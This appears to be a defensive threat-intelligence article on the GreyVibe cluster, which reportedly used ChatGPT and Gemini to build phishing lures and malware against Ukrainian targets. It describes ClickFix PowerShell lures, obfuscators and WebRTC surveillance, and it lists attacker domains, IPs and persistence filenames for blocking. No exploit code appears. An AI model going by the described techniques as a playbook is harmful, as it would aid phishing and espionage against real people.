GreyVibe: Russia Uses ChatGPT and Gemini to Launch AI-Powered Cyberattacks

GreyVibe, a Russia-nexus threat cluster first identified by cybersecurity firm WithSecure in January 2026, has been using ChatGPT, Google Gemini, and Ideogram AI to generate phishing lures and develop malware targeting Ukrainian military personnel, government agencies, energy infrastructure, and emergency services. The full WithSecure Labs report, published May 28, 2026, makes GreyVibe one of the first documented cases in which forensic evidence confirms AI tool use across both social engineering and malware development within a single threat actor's pipeline. Five distinct campaigns, three malware families, and four custom obfuscators are detailed — with LLM (Large Language Model — AI systems like ChatGPT or Gemini that generate text, images, and code from prompts) fingerprints identifiable in generated lure images and assessed in the malware source code itself.

// 01 GreyVibe: Technical Details

WithSecure classifies GreyVibe as a Russia-nexus threat cluster — distinct from a formally designated APT (Advanced Persistent Threat — a sophisticated, often state-linked hacking group that conducts long-running, targeted espionage or disruption operations). Researchers describe the group as "low-to-moderately sophisticated," lacking the operational discipline of mature nation-state actors, though their use of AI tools substantially raises their effective output.

Attribution indicators pointing to Russian origin include:

• Malware admin panels and code comments written in Russian
• C2 (Command-and-Control — the server infrastructure attackers use to remotely manage compromised systems and receive stolen data) servers configured to UTC+3 (Moscow Standard Time)
• Activity patterns and targeting aligned with Russian strategic interests against Ukraine
• Early GreyVibe samples share a unique ISO builder with UAC-0098 — a threat cluster composed of former TrickBot and Conti ransomware operators who pivoted to targeting Ukraine following Russia's full-scale invasion in February 2022

The group's most significant documented innovation is its confirmed use of commercial AI tools. WithSecure researcher Mohammad Kazem Hassan Nejad identified literal LLM watermarking artifacts embedded in phishing lure images — a forensic indicator that images were generated by ChatGPT's DALL-E or a comparable model, rather than crafted manually or sourced from stock photography. The LegionRelay PowerShell RAT (Remote Access Trojan — malware that grants attackers remote control of an infected system) was assessed as likely substantially or fully developed with AI coding assistance, based on code style patterns inconsistent with typical manual authorship by a human programmer.

GreyVibe also deployed four custom obfuscators — tools that scramble malware code to prevent security scanners from recognizing it — with LLM assistance:

• LOOKVALPS — obfuscates PowerShell payloads
• LOOKVALJS — obfuscates JavaScript loaders
• DAYLIGHT and TEASOUP — additional obfuscation layers applied before delivery

YARA detection rules (a pattern-matching language used by security tools to identify malware) for all four obfuscators and all malware families have been published by WithSecure on GitHub.

// 02 Exploitation Status and Threat Landscape

GreyVibe does not exploit software vulnerabilities — no CVEs (Common Vulnerabilities and Exposures — a standardized catalog of publicly disclosed software flaws) are associated with this threat cluster. All initial access is achieved through social engineering: the group invests heavily in AI-generated, realistic lure content to trick targets into running malicious code voluntarily.

Five named campaigns were active between August 2025 and May 2026:

PhantomMail employs spearphishing emails (MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment) delivering malicious ZIP/RAR archives via Google Drive and 4sync file-hosting links. Decoy PDFs impersonate Ukrainian government agencies, emergency services (DSNS — Ukraine's State Emergency Service), energy companies, and telecom providers. The malware executes silently while the decoy document displays normally.

PhantomClick deploys fake CAPTCHA and ClickFix pages impersonating Zoom conferencing and LAPAS (Ukraine's government portal). Victims see a "Cloudflare verification" prompt that instructs them to run a PowerShell command (T1059.001 — Command and Scripting Interpreter: PowerShell). This "living off the land" technique uses Windows' built-in scripting engine, leaving minimal malware artifacts on disk and defeating signature-based detection.

PrincessClub operates fake Ukrainian adult and dating websites that deliver both FallSpy (Android spyware) and PhantomRelay/LegionRelay (Windows RATs). Operators ran fake female Telegram personas to build trust with targets over extended periods. A particularly novel tactic: operators used WebRTC (Web Real-Time Communication — a browser API enabling live audio and video) to conduct surveillance of targets during live video calls without requiring any software installation on the victim's device.

DroneLink built fake Ukrainian military charity websites themed around FPV (First-Person View) drone operators and UAV (Unmanned Aerial Vehicle) fundraising. The campaign targeted military personnel and drone support networks, sharing infrastructure with PrincessClub — indicating the same operator cell ran both.

Nebo deployed fake Russian-language military communications login pages designed to harvest credentials from Ukrainian personnel attempting to access Russian communications platforms — a direct military intelligence collection operation.

// 03 Who Is Affected

GreyVibe's confirmed targeting is concentrated in Ukraine, with particular emphasis on the Kharkiv region — the front-line oblast closest to active Russian offensive operations. Targeted populations include:

• Ukrainian military personnel — drone operators, FPV unit members, soldiers accessing communications infrastructure
• Government agency employees — impersonated agencies include DSNS (emergency services), customs, and civil protection offices
• Energy sector workers — Centrenergo impersonation in PhantomMail samples indicates grid and power plant targeting
• Telecom employees — industry-specific lures documented in PhantomMail
• General Ukrainian civilians — via fake dating sites (PrincessClub), harvesting personal data that may feed targeting intelligence

While confirmed activity is Ukraine-focused, GreyVibe's AI-assisted lure generation pipeline can be retargeted to other geographies with minimal operator effort. The no-code AI approach makes geographic or sector pivots trivially easy.

// 04 What You Should Do Right Now

• Import WithSecure's YARA rules from the WithSecure GitHub repository. Rules cover DAYLIGHT, TEASOUP, LOOKVALPS, LOOKVALJS, all three PhantomRelay variants, LegionRelay, and FallSpy — providing full coverage of the GreyVibe malware portfolio.

• Block GreyVibe C2 domains at your perimeter. Confirmed C2 domains include goodhillsenterprise.com, ny-car-dealership.it.com, doct0rsim.com, routinesyscheckup.com, serotoninenterprise.com, newstarcommunity.com, and jackscommunications.com. Full IOC list including 19 C2 domains at the WithSecure IOC repository.

• Block phishing infrastructure domains. PhantomClick uses lapas.live, zoomconference.click, zoomconference.app. PrincessClub uses princess-mens.fun, princessclub.click, princessclub.best, and related domains. DroneLink fake charities include frontforce.org, ukrguard.org, ukrbezpeka.online, ironbrave.online, ukrvarta.online.

• Null-route GreyVibe C2 IP addresses. Known C2 IPs: 188.124.59.120, 193.233.23.81, 89.37.185.60, 74.112.102.120, 194.87.128.243, 194.87.108.110, 89.125.189.118, 89.125.189.85, 91.149.221.124.

• Train users specifically on ClickFix and fake-CAPTCHA PowerShell lures. PhantomClick relies entirely on the victim manually running a PowerShell command after a fake browser prompt. No exploit is involved — only social engineering. Security awareness training targeting this specific technique is more effective here than technical controls.

• Monitor for LegionRelay persistence artifacts. Alert on scheduled tasks executing any of the following scripts: RzTelemetry.ps1, SysCheckupService.ps1, SystemHealthSvc.ps1, WUDFHost.ps1, amd.ps1, backup.ps1. These are documented LegionRelay persistence filenames. Correlate with outbound REST API connections to unrecognized domains.

// 05 Background: Understanding the Risk

The operational significance of GreyVibe is not its sophistication level — it is, as WithSecure acknowledges, a "low-to-moderately sophisticated" cluster. The significance is the forensically confirmed use of AI tools across both the social engineering pipeline and malware development, documented for the first time in a public threat research report.

Before 2026, claims of AI-assisted cyberattacks were largely speculative or based on indirect evidence. Google's Threat Intelligence Group reported in February 2026 that multiple state-backed actors were using Gemini for attack research. GreyVibe is the first case where LLM artifact markers in attack images — not operator claims — forensically confirm commercial AI use. This is a methodological milestone in threat attribution.

The PrincessClub campaign's use of WebRTC live-video calls on fake dating sites represents a distinct escalation: conducting real-time audio and visual surveillance of targets without installing any software on the victim's device defeats all endpoint detection. Traditional malware analysis, behavioral sandboxing, and EDR (Endpoint Detection and Response — software monitoring devices for suspicious activity) have no visibility into a video call. The defense against this technique is human awareness, not technology.

The connection to UAC-0098 — former TrickBot and Conti ransomware operators now redirected toward Ukrainian targets — illustrates a documented Russian strategic pattern: tasking former criminal organizations as low-cost, deniable cyber operators during active conflict. This model was previously observed with Sandworm and EvilCorp precedents and suggests GreyVibe's operators may have direct or indirect ties to Russian intelligence structures.

GreyVibe's five campaigns collectively targeted virtually every layer of Ukrainian society relevant to the conflict: military operators, government administrators, critical infrastructure workers, and civilians. The breadth of targeting, combined with AI-assisted scale, positions this cluster as a persistent intelligence collection threat that will likely outlast the current conflict phase.

// 06 Conclusion

GreyVibe represents the first forensically documented case of AI-generated lures and AI-coded malware within a single threat cluster's active operational pipeline, running against Ukrainian military and infrastructure targets since at least August 2025. Security teams — especially those supporting Ukrainian operations, EU organizations, or NATO partners — should immediately import WithSecure's YARA rules, block the listed IOCs, and prioritize user training on ClickFix-style PowerShell execution lures. The attack chain depends entirely on human error, not software vulnerabilities, making awareness the most effective mitigation available today.